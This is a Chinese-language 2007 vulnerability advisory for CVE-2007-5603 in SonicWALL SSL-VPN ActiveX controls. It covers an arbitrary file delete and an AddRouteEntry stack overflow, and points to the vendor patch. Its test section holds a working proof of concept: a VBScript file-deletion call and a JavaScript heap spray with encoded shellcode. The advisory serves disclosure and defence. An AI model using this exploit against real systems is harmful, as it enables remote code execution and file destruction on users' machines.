SonicWALL SSL VPN客户端ActiveX控件多个安全漏洞
发布日期:2007-11-01
更新日期:2007-11-02
受影响系统:SonicWALL SSL-VPN 1.3.0.3
不受影响系统:SonicWALL SSL-VPN 2000/4000 2.5
SonicWALL SSL-VPN 200 2.1
描述:
BUGTRAQ ID:
26288
CVE(CAN) ID:
CVE-2007-5603
SonicWALL SSL-VPN可以为企业网络提供简单易用的VPN解决方案。
SonicWALL SSL-VPN的ActiveX控件实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞控制用户系统。
SonicWALL SSL-VPN解决方案所安装的WebCacheCleaner ActiveX控件的FileDelete()方式没有正确地验证某些参数,允许攻击者删除客户端上的任意文件;此外NELaunchCtrl ActiveX控件的AddRouteEntry()方式在处理第二个参数时未经长度检查便拷贝到了栈缓冲区,使用以下方式便可以将进程跳转到UVWX域:
o.AddRouteEntry ("", "ABCDEFGHIJKLMNOPQRSTUVWX");
以下属性还受Unicode溢出的影响:
serverAddress
sessionId
clientIPLower
clientIPHigher
userName
domainName
dnsSuffix
<*来源:Bernhard Mueller (
research@sec-consult.com)
链接:
http://marc.info/?l=bugtraq&m=119393761324021&w=2
http://secunia.com/advisories/27469/
http://www.kb.cert.org/vuls/id/298521
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")
<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
<script>
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
buf = "";
for(i = 0; i < 50; i++)
buf += unescape("%05%05%05%05");
nelx.AddRouteEntry("", buf);
</script>
建议:
厂商补丁:
SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sonicwall.com浏览次数:4446
严重程度:0(网友投票)
